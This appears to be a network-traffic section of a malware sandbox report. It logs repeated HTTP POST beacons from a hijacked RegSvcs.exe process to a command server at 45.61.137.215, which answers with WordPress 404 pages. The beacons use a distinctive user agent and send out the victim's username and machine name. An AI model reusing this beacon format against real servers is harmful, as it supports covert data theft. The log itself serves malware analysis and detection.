May 29, 2024 15:45:17.857075930 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:17.862200022 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:20.476535082 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:18 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:20.476542950 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:45:20.476608992 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:45:20.476638079 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:45:20.476702929 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:45:20.476710081 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:45:20.476723909 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:20.476735115 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:20.476746082 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:20.476980925 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.9	49788	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:20.705538034 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:20.710968018 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:23.218996048 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:21 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:23.219027996 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:23.219065905 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:23.219083071 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:23.219115973 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:23.219132900 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:45:23.219166994 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:45:23.219183922 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 29, 2024 15:45:23.219221115 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 29, 2024 15:45:23.219244003 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.9	49789	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:23.375855923 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:23.380857944 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:25.972965956 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:23 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:25.973031998 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:25.973088026 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:25.973102093 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:25.973134995 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:45:25.973170042 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:45:25.973298073 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:25.973350048 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:45:25.973378897 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
